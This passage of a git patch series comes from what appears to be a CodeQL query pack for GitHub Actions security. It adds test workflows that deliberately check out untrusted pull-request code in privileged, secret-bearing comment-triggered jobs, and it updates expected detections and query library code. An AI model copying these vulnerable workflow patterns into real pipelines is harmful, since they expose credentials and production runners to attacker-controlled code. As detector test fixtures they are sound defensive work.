000000000000..16bb6bf876c3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml @@ -0,0 +1,94 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml new file mode 100644 index 000000000000..878b83779613 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml @@ -0,0 +1,96 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml new file mode 100644 index 000000000000..0a73e86d5fc6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml @@ -0,0 +1,31 @@ +on: + issue_comment: + types: + - created +jobs: + danger-for-external: + name: Danger for external - Node.js 16 + if: | + github.event_name == 'issue_comment' && github.event.action == 'created' + && github.event.issue.pull_request != null + && startsWith(github.event.comment.body, '/danger') + runs-on: ubuntu-latest + steps: + - name: Check repository permission for user + uses: sushichop/action-repository-permission@v2 + with: + required-permission: write + reaction-permitted: rocket + comment-not-permitted: Sorry, you don't have enough permission to execute `/danger`... + - name: Clone the PR source + uses: actions/checkout@v3 + with: + ref: refs/pull/${{ github.event.issue.number }}/head + fetch-depth: 0 + - uses: actions/setup-node@v3 + with: + node-version: 16 + - name: Danger JS + run: npx danger ci + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index c91470d5cc84..5d38b397a428 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -27,4 +27,5 @@ | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | +| .github/workflows/test13.yml:14:7:20:4 | Uses Step | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 7313ffd9ae33..8bb9e02559c8 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -175,6 +175,15 @@ edges | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | +| .github/workflows/test11.yml:30:7:45:4 | Run Step | .github/workflows/test11.yml:45:7:84:4 | Run Step: environment | +| .github/workflows/test11.yml:45:7:84:4 | Run Step: environment | .github/workflows/test11.yml:84:7:90:4 | Uses Step | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | +| .github/workflows/test12.yml:32:7:47:4 | Run Step | .github/workflows/test12.yml:47:7:86:4 | Run Step: environment | +| .github/workflows/test12.yml:47:7:86:4 | Run Step: environment | .github/workflows/test12.yml:86:7:92:4 | Uses Step | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | .github/workflows/test12.yml:92:7:95:54 | Uses Step | +| .github/workflows/test13.yml:14:7:20:4 | Uses Step | .github/workflows/test13.yml:20:7:25:4 | Uses Step | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | .github/workflows/test13.yml:25:7:28:4 | Uses Step | +| .github/workflows/test13.yml:25:7:28:4 | Uses Step | .github/workflows/test13.yml:28:7:31:50 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -223,7 +232,7 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index b9cf0e547ca7..181bd5673bc4 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -18,6 +18,7 @@ | .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From db328f0b164f91338280a0b485a6ecf8df52a85d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 19 Sep 2024 18:24:08 +0200 Subject: [PATCH 512/707] Improve Association check --- .../codeql/actions/security/ControlChecks.qll | 27 ++++++++++--------- 1 file changed, 15 insertions(+), 12 deletions(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 650ae8d8105a..26bee3ca3a68 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -66,7 +66,7 @@ abstract class ControlCheck extends AstNode { } abstract class AssociationCheck extends ControlCheck { - // Checks if the actor is a COLLABORATOR of the repo + // Checks if the actor is a MEMBER/OWNER the repo // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { @@ -182,23 +182,26 @@ class RepositoryIfCheck extends RepositoryCheck instanceof If { class AssociationIfCheck extends AssociationCheck instanceof If { AssociationIfCheck() { // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.comment\\.author_association\\b", - "\\bgithub\\.event\\.issue\\.author_association\\b", - "\\bgithub\\.event\\.pull_request\\.author_association\\b", - ], _, _) - ) + normalizeExpr(this.getCondition()) + .splitAt("\n") + .regexpMatch([ + ".*\\bgithub\\.event\\.comment\\.author_association\\b.*", + ".*\\bgithub\\.event\\.issue\\.author_association\\b.*", + ".*\\bgithub\\.event\\.pull_request\\.author_association\\b.*", + ]) and + normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bMEMBER\\b.*") and + normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bOWNER\\b.*") } } class AssociationActionCheck extends AssociationCheck instanceof UsesStep { AssociationActionCheck() { this.getCallee() = "TheModdingInquisition/actions-team-membership" and - not exists(this.getArgument("exit")) - or - this.getArgument("exit") = "true" + ( + not exists(this.getArgument("exit")) + or + this.getArgument("exit") = "true" + ) } } From c3d7af8f59383e55202ce3b7575b05bba2861952 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 19 Sep 2024 18:44:23 +0200 Subject: [PATCH 513/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 285f9cfe5235..9a798b891ba4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.45 +version: 0.1.46 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 3c02acfff199..01b36fe62cde 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.45 +version: 0.1.46 groups: [actions, queries] suites: codeql-suites extractor: javascript From c20e407c16931300a355790e14d77864cb92d593 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 20 Sep 2024 11:52:44 +0200 Subject: [PATCH 514/707] Modify UnpinnedActionsTag report node --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 6 ++ ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- .../CWE-829/UnpinnedActionsTag.expected | 62 +++++++++---------- 4 files changed, 40 insertions(+), 32 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 23832b35bd59..c83abb1ea1dd 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -264,6 +264,8 @@ class Environment extends AstNode instanceof EnvironmentImpl { abstract class Uses extends AstNode instanceof UsesImpl { string getCallee() { result = super.getCallee() } + ScalarValue getCalleeNode() { result = super.getCalleeNode() } + string getVersion() { result = super.getVersion() } int getMajorVersion() { result = super.getMajorVersion() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 23b5ead7f0ef..2267c7ff694a 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1147,6 +1147,8 @@ class EnvImpl extends AstNodeImpl, TEnvNode { abstract class UsesImpl extends AstNodeImpl { abstract string getCallee(); + abstract ScalarValueImpl getCalleeNode(); + abstract string getVersion(); int getMajorVersion() { @@ -1197,6 +1199,8 @@ class UsesStepImpl extends StepImpl, UsesImpl { else result = u.getValue() } + override ScalarValueImpl getCalleeNode() { result.getNode() = u } + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } @@ -1230,6 +1234,8 @@ class ExternalJobImpl extends JobImpl, UsesImpl { u.getValue().regexpCapture(repoUsesParser(), 3) } + override ScalarValueImpl getCalleeNode() { result.getNode() = u } + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index ecdb1d065263..10c21bc368b5 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -33,6 +33,6 @@ where uses.getVersion() = version and not isTrustedOrg(repo) and not isPinnedCommit(version) -select uses, +select uses.getCalleeNode(), "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + "', not a pinned commit hash", uses, uses.toString() diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 5d38b397a428..008c36967890 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,31 +1,31 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | -| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | -| .github/workflows/test13.yml:14:7:20:4 | Uses Step | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:19:13:19:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:13:23:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 